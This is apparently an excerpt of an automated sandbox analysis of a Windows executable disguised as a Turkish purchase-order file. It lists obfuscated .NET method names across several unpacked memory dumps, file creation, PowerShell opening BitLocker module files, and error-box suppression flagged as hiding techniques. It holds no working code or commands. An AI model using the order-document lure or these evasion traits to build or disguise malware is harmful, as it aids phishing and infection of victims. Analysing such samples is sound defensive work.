Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QqlyG2yUroCQBSjlaj.cs High entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, lRVMMQ7c1IGVLKEkhr.cs High entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, emyWIGHbSXMIRhxwNX.cs High entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, GVjN9whr55tAhqTxFy.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, mxTpCXNb7RZS8xnVZu.cs High entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, idQ27mYX9UnZa99BEF.cs High entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, YE9vLiO8DUROdAZd9B.cs High entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, i7RJE7XwppAcletnM9.cs High entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, PO2kQtp1JBrSKZQBcm.cs High entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QC27IVIPJyY2iLVvXQY.cs High entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, NLihc4KTvML7Gt74oU.cs High entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, RZotG5zHlXj2AtOOx9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, BYAiMKsC49DgNV7vk5.cs High entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, fOm1m09TqPZZgHoxih.cs High entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, KYYaPOIITSshMUwPMtC.cs High entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, DUJu7MF7E5pcBffxuY.cs High entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QHdg36IxiiKlOn5o3Cc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, xtehnoGNiTQwATOPxp.cs High entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, UnGAfJ2eZZ7CCMnQjv.cs High entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs High entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, QqlyG2yUroCQBSjlaj.cs High entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, lRVMMQ7c1IGVLKEkhr.cs High entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, emyWIGHbSXMIRhxwNX.cs High entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, GVjN9whr55tAhqTxFy.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, mxTpCXNb7RZS8xnVZu.cs High entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, idQ27mYX9UnZa99BEF.cs High entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, YE9vLiO8DUROdAZd9B.cs High entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, i7RJE7XwppAcletnM9.cs High entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, PO2kQtp1JBrSKZQBcm.cs High entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, QC27IVIPJyY2iLVvXQY.cs High entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, NLihc4KTvML7Gt74oU.cs High entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, RZotG5zHlXj2AtOOx9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, BYAiMKsC49DgNV7vk5.cs High entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, fOm1m09TqPZZgHoxih.cs High entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, KYYaPOIITSshMUwPMtC.cs High entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, DUJu7MF7E5pcBffxuY.cs High entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, QHdg36IxiiKlOn5o3Cc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, xtehnoGNiTQwATOPxp.cs High entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, UnGAfJ2eZZ7CCMnQjv.cs High entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs High entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, QqlyG2yUroCQBSjlaj.cs High entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, lRVMMQ7c1IGVLKEkhr.cs High entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, emyWIGHbSXMIRhxwNX.cs High entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, GVjN9whr55tAhqTxFy.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, mxTpCXNb7RZS8xnVZu.cs High entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, idQ27mYX9UnZa99BEF.cs High entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, YE9vLiO8DUROdAZd9B.cs High entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, i7RJE7XwppAcletnM9.cs High entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, PO2kQtp1JBrSKZQBcm.cs High entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, QC27IVIPJyY2iLVvXQY.cs High entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, NLihc4KTvML7Gt74oU.cs High entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, RZotG5zHlXj2AtOOx9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, BYAiMKsC49DgNV7vk5.cs High entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, fOm1m09TqPZZgHoxih.cs High entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, KYYaPOIITSshMUwPMtC.cs High entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, DUJu7MF7E5pcBffxuY.cs High entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, QHdg36IxiiKlOn5o3Cc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, xtehnoGNiTQwATOPxp.cs High entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, UnGAfJ2eZZ7CCMnQjv.cs High entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX Jump to behavior
